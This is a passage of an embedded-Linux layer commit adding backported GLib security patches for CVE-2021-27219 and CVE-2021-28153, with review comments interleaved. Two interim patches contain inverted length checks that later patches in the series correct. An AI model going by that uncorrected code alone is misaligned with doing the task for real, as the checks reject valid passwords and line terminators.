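+ #include "glibintl.h"
+
+ #include "gioenumtypes.h"
++#include "gstrfuncsprivate.h"
+ #include "gtlspassword.h"
+
+ #include <string.h>
+@@ -287,9 +288,14 @@ g_tls_password_set_value (GTlsPassword *password,
+ g_return_if_fail (G_IS_TLS_PASSWORD (password));
+
+ if (length < 0)
+- length = strlen ((gchar *)value);
++ {
++ /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */
++ gsize length_unsigned = strlen ((gchar *) value);
++ g_return_if_fail (length_unsigned > G_MAXSSIZE);
++ length = (gssize) length_unsigned;
++ }
+
+- g_tls_password_set_value_full (password, g_memdup (value, length), length, g_free);
++ g_tls_password_set_value_full (password, g_memdup2 (value, (gsize) length), length, g_free);
+ }
+
+ /**
+--
+GitLab
+
+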
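Review bot: The guard added in `g_tls_password_set_value()`, `g_return_if_fail (length_unsigned > G_MAXSSIZE);`, is inverted, so with this file applied on its own every nul-terminated password passed with `length < 0` is rejected and never stored. CVE-2021-27219-11.patch has the same inversion in `g_io_channel_set_line_term()` and also still assigns the signed `length` to `channel->line_term_len`. The corrections live in separate files of this commit (reg1-4 for this one, reg1-1 and reg1-2 for patch 11), so each pair has to be applied together and in order. The recipe's patch list is not visible here, so that ordering should be checked there, and a header line in each file such as `Depends on CVE-2021-27219-reg1-4.patch (corrects the length check)` would keep one half from being dropped in a later rebase.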
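diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch
new file mode 100644
index 0000000000..a620a49269
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch
@@ -0,0 +1,63 @@
+From ecdf91400e9a538695a0895b95ad7e8abcdf1749 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 14:09:40 +0000
+Subject: [PATCH 11/11] giochannel: Forbid very long line terminator strings
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The public API `GIOChannel.line_term_len` is only a `guint`. Ensure that
+nul-terminated strings passed to `g_io_channel_set_line_term()` can’t
+exceed that length. Use `g_memdup2()` to avoid a warning (`g_memdup()`
+is due to be deprecated), but not to avoid a bug, since it’s also
+limited to `G_MAXUINT`.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/giochannel.c | 17 +++++++++++++----
+ 1 file changed, 13 insertions(+), 4 deletions(-)
+
+diff --git a/glib/giochannel.c b/glib/giochannel.c
+index c6a89d6e0..4dec20f77 100644
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -887,16 +887,25 @@ g_io_channel_set_line_term (GIOChannel *channel,
+ const gchar *line_term,
+ gint length)
+ {
++ guint length_unsigned;
++
+ g_return_if_fail (channel != NULL);
+ g_return_if_fail (line_term == NULL || length != 0); /* Disallow "" */
+
+ if (line_term == NULL)
+- length = 0;
+- else if (length < 0)
+- length = strlen (line_term);
++ length_unsigned = 0;
++ else if (length >= 0)
++ length_unsigned = (guint) length;
++ else
++ {
++ /* FIXME: We’re constrained by line_term_len being a guint here */
++ gsize length_size = strlen (line_term);
++ g_return_if_fail (length_size > G_MAXUINT);
++ length_unsigned = (guint) length_size;
++ }
+
+ g_free (channel->line_term);
+- channel->line_term = line_term ? g_memdup (line_term, length) : NULL;
++ channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL;
+ channel->line_term_len = length;
+ }
+
+--
+GitLab
+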
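diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch
new file mode 100644
index 0000000000..3047062f54
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch
@@ -0,0 +1,36 @@
+From f8273b9aded135fe07094faebd527e43851aaf6e Mon Sep 17 00:00:00 2001
+From: "Jan Alexander Steffens (heftig)" <jan.steffens@gmail.com>
+Date: Sun, 7 Feb 2021 23:32:40 +0100
+Subject: [PATCH 1/5] giochannel: Fix length_size bounds check
+
+The inverted condition is an obvious error introduced by ecdf91400e9a.
+
+Fixes https://gitlab.gnome.org/GNOME/glib/-/issues/2323
+
+(cherry picked from commit a149bf2f9030168051942124536e303af8ba6176)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/giochannel.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/glib/giochannel.c b/glib/giochannel.c
+index 4dec20f77..c3f3102ff 100644
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -896,7 +896,7 @@ g_io_channel_set_line_term (GIOChannel *channel,
+ {
+ /* FIXME: We’re constrained by line_term_len being a guint here */
+ gsize length_size = strlen (line_term);
+- g_return_if_fail (length_size > G_MAXUINT);
++ g_return_if_fail (length_size <= G_MAXUINT);
+ length_unsigned = (guint) length_size;
+ }
+
+--
+GitLab
+
+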
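diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch
new file mode 100644
index 0000000000..2ba26075df
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch
@@ -0,0 +1,38 @@
+From e069c50467712e6d607822afd6b6c15c2c343dff Mon Sep 17 00:00:00 2001
+From: Simon McVittie <smcv@collabora.com>
+Date: Mon, 8 Feb 2021 10:34:50 +0000
+Subject: [PATCH 2/5] giochannel: Don't store negative line_term_len in
+ GIOChannel struct
+
+Adding test coverage indicated that this was another bug in 0cc11f74.
+
+Fixes: 0cc11f74 "giochannel: Forbid very long line terminator strings"
+Resolves: https://gitlab.gnome.org/GNOME/glib/-/issues/2323
+Signed-off-by: Simon McVittie <smcv@collabora.com>
+(cherry picked from commit 5dc8b0014c03e7491d93b90275ab442e888a9628)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/giochannel.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/glib/giochannel.c b/glib/giochannel.c
+index c3f3102ff..19bb06ba6 100644
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -902,7 +902,7 @@ g_io_channel_set_line_term (GIOChannel *channel,
+
+ g_free (channel->line_term);
+ channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL;
+- channel->line_term_len = length;
++ channel->line_term_len = length_unsigned;
+ }
+
+ /**
+--
+GitLab
+
+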
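Review bot: The regression series added here goes from reg1-2 (`PATCH 2/5`) straight to reg1-4 (`PATCH 4/5`), so `PATCH 3/5` is not carried in the part of the commit visible on this page, while this patch's message says the bug was found by "adding test coverage". If 3/5 is that giochannel test, the `line_term_len` fix lands without the test that exercises it; either carry it or add a header line saying why it was left out. The `Fixes: 0cc11f74` trailer also names a hash that does not match the `From ecdf9140…` line of CVE-2021-27219-11.patch, the file this change corrects, so naming that file in the header would keep the link traceable inside the layer.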
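diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch
new file mode 100644
index 0000000000..2c388b4bbb
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch
@@ -0,0 +1,38 @@
+From 4506d1859a863087598c8d122740bae25b65b099 Mon Sep 17 00:00:00 2001
+From: Simon McVittie <smcv@collabora.com>
+Date: Mon, 8 Feb 2021 10:04:48 +0000
+Subject: [PATCH 4/5] gtlspassword: Fix inverted assertion
+
+The intention here was to assert that the length of the password fits
+in a gssize. Passwords more than half the size of virtual memory are
+probably excessive.
+
+Fixes: a8b204ff "gtlspassword: Forbid very long TLS passwords"
+Signed-off-by: Simon McVittie <smcv@collabora.com>
+(cherry picked from commit 61bb52ec42de1082bfb06ce1c737fc295bfe60b8)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gtlspassword.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c
+index dbcec41a8..bd86a6dfe 100644
+--- a/gio/gtlspassword.c
++++ b/gio/gtlspassword.c
+@@ -291,7 +291,7 @@ g_tls_password_set_value (GTlsPassword *password,
+ {
+ /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */
+ gsize length_unsigned = strlen ((gchar *) value);
+- g_return_if_fail (length_unsigned > G_MAXSSIZE);
++ g_return_if_fail (length_unsigned <= G_MAXSSIZE);
+ length = (gssize) length_unsigned;
+ }
+
+--
+GitLab
+
+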
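diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch
new file mode 100644
index 0000000000..356e986fe0
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch
@@ -0,0 +1,100 @@
+From 3d1550354c3c6a8491c39881752d51cb7515f2c2 Mon Sep 17 00:00:00 2001
+From: Simon McVittie <smcv@collabora.com>
+Date: Mon, 8 Feb 2021 10:22:39 +0000
+Subject: [PATCH 5/5] tls-interaction: Add test coverage for various ways to
+ set the password
+
+Signed-off-by: Simon McVittie <smcv@collabora.com>
+(cherry picked from commit df4501316ca3903072400504a5ea76498db19538)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/tests/tls-interaction.c | 55 +++++++++++++++++++++++++++++++++++++
+ 1 file changed, 55 insertions(+)
+
+diff --git a/gio/tests/tls-interaction.c b/gio/tests/tls-interaction.c
+index 4f0737d7e..5661e8e0d 100644
+--- a/gio/tests/tls-interaction.c
++++ b/gio/tests/tls-interaction.c
+@@ -174,6 +174,38 @@ test_interaction_ask_password_finish_failure (GTlsInteraction *interaction,
+ }
+
+
++/* Return a copy of @str that is allocated in a silly way, to exercise
++ * custom free-functions. The returned pointer points to a copy of @str
++ * in a buffer of the form "BEFORE \0 str \0 AFTER". */
++static guchar *
++special_dup (const char *str)
++{
++ GString *buf = g_string_new ("BEFORE");
++ guchar *ret;
++
++ g_string_append_c (buf, '\0');
++ g_string_append (buf, str);
++ g_string_append_c (buf, '\0');
++ g_string_append (buf, "AFTER");
++ ret = (guchar *) g_string_free (buf, FALSE);
++ return ret + strlen ("BEFORE") + 1;
++}
++
++
++/* Free a copy of @str that was made with special_dup(), after asserting
++ * that it has not been corrupted. */
++static void
++special_free (gpointer p)
++{
++ gchar *s = p;
++ gchar *buf = s - strlen ("BEFORE") - 1;
++
++ g_assert_cmpstr (buf, ==, "BEFORE");
++ g_assert_cmpstr (s + strlen (s) + 1, ==, "AFTER");
++ g_free (buf);
++}
++
++
+ static GTlsInteractionResult
+ test_interaction_ask_password_sync_success (GTlsInteraction *interaction,
+ GTlsPassword *password,
+@@ -181,6 +213,8 @@ test_interaction_ask_password_sync_success (GTlsInteraction *interaction,
+ GError **error)
+ {
+ TestInteraction *self;
++ const guchar *value;
++ gsize len;
+
+ g_assert (TEST_IS_INTERACTION (interaction));
+ self = TEST_INTERACTION (interaction);
+@@ -192,6 +226,27 @@ test_interaction_ask_password_sync_success (GTlsInteraction *interaction,
+ g_assert (error != NULL);
+ g_assert (*error == NULL);
+
++ /* Exercise different ways to set the value */
++ g_tls_password_set_value (password, (const guchar *) "foo", 4);
++ len = 0;
++ value = g_tls_password_get_value (password, &len);
++ g_assert_cmpmem (value, len, "foo", 4);
++
++ g_tls_password_set_value (password, (const guchar *) "bar", -1);
++ len = 0;
++ value = g_tls_password_get_value (password, &len);
++ g_assert_cmpmem (value, len, "bar", 3);
++
++ g_tls_password_set_value_full (password, special_dup ("baa"), 4, special_free);
++ len = 0;
++ value = g_tls_password_get_value (password, &len);
++ g_assert_cmpmem (value, len, "baa", 4);
++
++ g_tls_password_set_value_full (password, special_dup ("baz"), -1, special_free);
++ len = 0;
++ value = g_tls_password_get_value (password, &len);
++ g_assert_cmpmem (value, len, "baz", 3);
++
+ /* Don't do this in real life. Include a null terminator for testing */
+ g_tls_password_set_value (password, (const guchar *)"the password", 13);
+ return G_TLS_INTERACTION_HANDLED;
+--
+GitLab
+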
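diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch
new file mode 100644
index 0000000000..dd43689aae
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch
@@ -0,0 +1,49 @@
+From cb9ee701ef46c1819eed4e2a4dc181682bdfc176 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Feb 2021 21:16:39 +0000
+Subject: [PATCH 1/3] gkeyfilesettingsbackend: Fix basename handling when group
+ is unset
+
+Fix an effective regression in commit
+7781a9cbd2fd0aa84bee0f4eee88470640ff6706, which happens when
+`convert_path()` is called with a `key` which contains no slashes. In
+that case, the `key` is entirely the `basename`.
+
+Prior to commit 7781a9cb, the code worked through a fluke of `i == -1`
+cancelling out with the various additions in the `g_memdup()` call, and
+effectively resulting in `g_strdup (key)`.
+
+Spotted by Guido Berhoerster.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gkeyfilesettingsbackend.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
+index 25b057672..861c3a661 100644
+--- a/gio/gkeyfilesettingsbackend.c
++++ b/gio/gkeyfilesettingsbackend.c
+@@ -185,7 +185,12 @@ convert_path (GKeyfileSettingsBackend *kfsb,
+ }
+
+ if (basename)
+- *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
++ {
++ if (last_slash != NULL)
++ *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
++ else
++ *basename = g_strdup (key);
++ }
+
+ return TRUE;
+ }
+--
+GitLab
+
+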
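Review bot: The length in `g_memdup2 (last_slash + 1, key_len - (last_slash - key))` is easy to misread as one byte too long: it counts the slash itself, and that extra byte is what copies the terminating NUL of `key` into `*basename`. A one-line comment above the call would keep it from being "corrected" in a later backport, e.g. `/* the length counts the '/', which pays for the trailing NUL */`. `convert_path()` begins outside this hunk, so the relation `key_len == strlen (key)` after the prefix is stripped is taken from the earlier patch in the series rather than from these lines.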
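diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch
new file mode 100644
index 0000000000..04503641c3
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch
@@ -0,0 +1,43 @@
+From 31e0d403ba635dbbacbfbff74295e5db02558d76 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Feb 2021 21:19:30 +0000
+Subject: [PATCH 2/3] gkeyfilesettingsbackend: Disallow empty key or group
+ names
+
+These should never have been allowed; they will result in precondition
+failures from the `GKeyFile` later on in the code.
+
+A test will be added for this shortly.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gkeyfilesettingsbackend.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
+index 861c3a661..de216e615 100644
+--- a/gio/gkeyfilesettingsbackend.c
++++ b/gio/gkeyfilesettingsbackend.c
+@@ -158,6 +158,13 @@ convert_path (GKeyfileSettingsBackend *kfsb,
+
+ last_slash = strrchr (key, '/');
+
++ /* Disallow empty group names or key names */
++ if (key_len == 0 ||
++ (last_slash != NULL &&
++ (*(last_slash + 1) == '\0' ||
++ last_slash == key)))
++ return FALSE;
++
+ if (kfsb->root_group)
+ {
+ /* if a root_group was specified, make sure the user hasn't given
+--
+GitLab
+
+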
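diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch
new file mode 100644
index 0000000000..65f59287a8
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch
@@ -0,0 +1,232 @@
+Backport of:
+
+From 221c26685354dea2b2732df94404e8e5e77a1591 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Feb 2021 21:21:36 +0000
+Subject: [PATCH 3/3] tests: Add tests for key name handling in the keyfile
+ backend
+
+This tests the two recent commits.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/tests/gsettings.c | 170 +++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 169 insertions(+), 1 deletion(-)
+
+--- a/gio/tests/gsettings.c
++++ b/gio/tests/gsettings.c
+@@ -1,3 +1,4 @@
++#include <errno.h>
+ #include <stdlib.h>
+ #include <locale.h>
+ #include <libintl.h>
+@@ -1740,6 +1741,14 @@ key_changed_cb (GSettings *settings, con
+ (*b) = TRUE;
+ }
+
++typedef struct
++{
++ const gchar *path;
++ const gchar *root_group;
++ const gchar *keyfile_group;
++ const gchar *root_path;
++} KeyfileTestData;
++
+ /*
+ * Test that using a keyfile works
+ */
+@@ -1834,7 +1843,11 @@ test_keyfile (Fixture *fixture,
+ g_free (str);
+
+ g_settings_set (settings, "farewell", "s", "cheerio");
+-
++
++ /* Check that empty keys/groups are not allowed. */
++ g_assert_false (g_settings_is_writable (settings, ""));
++ g_assert_false (g_settings_is_writable (settings, "/"));
++
+ /* When executing as root, changing the mode of the keyfile will have
+ * no effect on the writability of the settings.
+ */
+@@ -1866,6 +1879,149 @@ test_keyfile (Fixture *fixture,
+ g_free (keyfile_path);
+ }
+
++/*
++ * Test that using a keyfile works with a schema with no path set.
++ */
++static void
++test_keyfile_no_path (Fixture *fixture,
++ gconstpointer user_data)
++{
++ const KeyfileTestData *test_data = user_data;
++ GSettingsBackend *kf_backend;
++ GSettings *settings;
++ GKeyFile *keyfile;
++ gboolean writable;
++ gchar *key = NULL;
++ GError *error = NULL;
++ gchar *keyfile_path = NULL, *store_path = NULL;
++
++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
++ kf_backend = g_keyfile_settings_backend_new (store_path, test_data->root_path, test_data->root_group);
++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, test_data->path);
++ g_object_unref (kf_backend);
++
++ g_settings_reset (settings, "test-boolean");
++ g_assert_true (g_settings_get_boolean (settings, "test-boolean"));
++
++ writable = g_settings_is_writable (settings, "test-boolean");
++ g_assert_true (writable);
++ g_settings_set (settings, "test-boolean", "b", FALSE);
++
++ g_assert_false (g_settings_get_boolean (settings, "test-boolean"));
++
++ g_settings_delay (settings);
++ g_settings_set (settings, "test-boolean", "b", TRUE);
++ g_settings_apply (settings);
++
++ keyfile = g_key_file_new ();
++ g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL));
++
++ g_assert_true (g_key_file_get_boolean (keyfile, test_data->keyfile_group, "test-boolean", NULL));
++
++ g_key_file_free (keyfile);
++
++ g_settings_reset (settings, "test-boolean");
++ g_settings_apply (settings);
++ keyfile = g_key_file_new ();
++ g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL));
++
++ g_assert_false (g_key_file_get_string (keyfile, test_data->keyfile_group, "test-boolean", &error));
++ g_assert_error (error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_KEY_NOT_FOUND);
++ g_clear_error (&error);
++
++ /* Check that empty keys/groups are not allowed. */
++ g_assert_false (g_settings_is_writable (settings, ""));
++ g_assert_false (g_settings_is_writable (settings, "/"));
++
++ /* Keys which ghost the root group name are not allowed. This can only be
++ * tested when the path is `/` as otherwise it acts as a prefix and prevents
++ * any ghosting. */
++ if (g_str_equal (test_data->path, "/"))
++ {
++ key = g_strdup_printf ("%s/%s", test_data->root_group, "");
++ g_assert_false (g_settings_is_writable (settings, key));
++ g_free (key);
++
++ key = g_strdup_printf ("%s/%s", test_data->root_group, "/");
++ g_assert_false (g_settings_is_writable (settings, key));
++ g_free (key);
++
++ key = g_strdup_printf ("%s/%s", test_data->root_group, "test-boolean");
++ g_assert_false (g_settings_is_writable (settings, key));
++ g_free (key);
++ }
++
++ g_key_file_free (keyfile);
++ g_object_unref (settings);
++
++ /* Clean up the temporary directory. */
++ g_assert_cmpint (g_chmod (keyfile_path, 0777) == 0 ? 0 : errno, ==, 0);
++ g_assert_cmpint (g_remove (store_path) == 0 ? 0 : errno, ==, 0);
++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
++ g_free (store_path);
++ g_free (keyfile_path);
++}
++
++/*
++ * Test that a keyfile rejects writes to keys outside its root path.
++ */
++static void
++test_keyfile_outside_root_path (Fixture *fixture,
++ gconstpointer user_data)
++{
++ GSettingsBackend *kf_backend;
++ GSettings *settings;
++ gchar *keyfile_path = NULL, *store_path = NULL;
++
++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
++ kf_backend = g_keyfile_settings_backend_new (store_path, "/tests/basic-types/", "root");
++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/tests/");
++ g_object_unref (kf_backend);
++
++ g_assert_false (g_settings_is_writable (settings, "test-boolean"));
++
++ g_object_unref (settings);
++
++ /* Clean up the temporary directory. The keyfile probably doesn’t exist, so
++ * don’t error on failure. */
++ g_remove (store_path);
++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
++ g_free (store_path);
++ g_free (keyfile_path);
++}
++
++/*
++ * Test that a keyfile rejects writes to keys in the root if no root group is set.
++ */
++static void
++test_keyfile_no_root_group (Fixture *fixture,
++ gconstpointer user_data)
++{
++ GSettingsBackend *kf_backend;
++ GSettings *settings;
++ gchar *keyfile_path = NULL, *store_path = NULL;
++
++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
++ kf_backend = g_keyfile_settings_backend_new (store_path, "/", NULL);
++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/");
++ g_object_unref (kf_backend);
++
++ g_assert_false (g_settings_is_writable (settings, "test-boolean"));
++ g_assert_true (g_settings_is_writable (settings, "child/test-boolean"));
++
++ g_object_unref (settings);
++
++ /* Clean up the temporary directory. The keyfile probably doesn’t exist, so
++ * don’t error on failure. */
++ g_remove (store_path);
++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
++ g_free (store_path);
++ g_free (keyfile_path);
++}
++
+ /* Test that getting child schemas works
+ */
+ static void
+@@ -2844,6 +3000,14 @@ main (int argc, char *argv[])
+ gchar *override_text;
+ gchar *enums;
+ gint result;
++ const KeyfileTestData keyfile_test_data_explicit_path = { "/tests/", "root", "tests", "/" };
++ const KeyfileTestData keyfile_test_data_empty_path = { "/", "root", "root", "/" };
++ const KeyfileTestData keyfile_test_data_long_path = {
++ "/tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch/",
++ "root",
++ "tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch",
++ "/"
++ };
+
+ /* Meson build sets this */
+ #ifdef TEST_LOCALE_PATH
+@@ -2967,6 +3131,11 @@ main (int argc, char *argv[])
+ }
+
+ g_test_add ("/gsettings/keyfile", Fixture, NULL, setup, test_keyfile, teardown);
++ g_test_add ("/gsettings/keyfile/explicit-path", Fixture, &keyfile_test_data_explicit_path, setup, test_keyfile_no_path, teardown);
++ g_test_add ("/gsettings/keyfile/empty-path", Fixture, &keyfile_test_data_empty_path, setup, test_keyfile_no_path, teardown);
++ g_test_add ("/gsettings/keyfile/long-path", Fixture, &keyfile_test_data_long_path, setup, test_keyfile_no_path, teardown);
++ g_test_add ("/gsettings/keyfile/outside-root-path", Fixture, NULL, setup, test_keyfile_outside_root_path, teardown);
++ g_test_add ("/gsettings/keyfile/no-root-group", Fixture, NULL, setup, test_keyfile_no_root_group, teardown);
+ g_test_add_func ("/gsettings/child-schema", test_child_schema);
+ g_test_add_func ("/gsettings/strinfo", test_strinfo);
+ g_test_add_func ("/gsettings/enums", test_enums);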
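Review bot: Both `g_key_file_load_from_file (keyfile, store_path, 0, NULL)` calls in `test_keyfile_no_path()` discard the error, so a failure on the target reports only that the assertion was false. The function already declares `GError *error`, so `g_key_file_load_from_file (keyfile, store_path, 0, &error);` followed by `g_assert_no_error (error);` would print why the store could not be read. The header also opens with "Backport of:" but does not say what was changed relative to upstream 221c2668; one sentence describing the adaptation would help the next person who rebases this file.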
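diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch
new file mode 100644
index 0000000000..c89ca20726
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch
@@ -0,0 +1,27 @@
+From 78420a75aeb70569a8cd79fa0fea7b786b6f785f Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:33:38 +0000
+Subject: [PATCH 1/5] glocalfileoutputstream: Fix a typo in a comment
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -851,7 +851,7 @@ handle_overwrite_open (const char *fi
+ mode = mode_from_flags_or_info (flags, reference_info);
+
+ /* We only need read access to the original file if we are creating a backup.
+- * We also add O_CREATE to avoid a race if the file was just removed */
++ * We also add O_CREAT to avoid a race if the file was just removed */
+ if (create_backup || readable)
+ open_flags = O_RDWR | O_CREAT | O_BINARY;
+ else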
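diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch
new file mode 100644
index 0000000000..8a35bab4de
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch
@@ -0,0 +1,42 @@
+From 32d3d02a50e7dcec5f4cf7908e7ac88d575d8fc5 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:34:32 +0000
+Subject: [PATCH 2/5] tests: Stop using g_test_bug_base() in file tests
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Since a following commit is going to add a new test which references
+Gitlab, so it’s best to move the URI bases inside the test cases.
+
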